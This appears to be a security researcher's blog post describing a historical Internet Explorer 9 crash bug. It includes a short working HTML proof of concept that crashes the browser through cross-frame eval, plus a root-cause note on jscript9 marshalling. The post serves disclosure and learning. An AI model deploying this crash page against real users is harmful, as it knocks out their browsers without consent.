IE9 DoS: xEval on Any Document Method

After playing around with cross-frame script execution in IE9, I noticed that calling eval from inside an iFrame and then executing any document method on the parent would reliably crash the browser. It was a simple setup that yielded a surprisingly consistent result.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE9_DoS_xEval_any_document_method</title></head>
<body>
<input type="button" size="50" onclick="eval('document.getElementById()')" value="CrashMe!">
<iframe name="iFrame" width="10" height="10"></iframe>
<script language="JavaScript">
    iFrame.eval('parent.eval()');
</script>
</body>
</html>

The crash happens inside jscript9!Js::CrossSite::MarshalFrameDisplay when the engine tries to dereference a frame display pointer obtained from the iFrame context. Calling eval inside the iFrame primes the cross-site thunk incorrectly, so any subsequent document method call in the parent hits a null or invalid pointer. The exploitability classification came back as UNKNOWN — it was not immediately weaponizable but was clearly an unintended state.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Crash (Deadcall): appendChild on a Dead createDocumentFragment] :: [IE9 UXSS: window.open Redirect with setTimeout Code Execution] >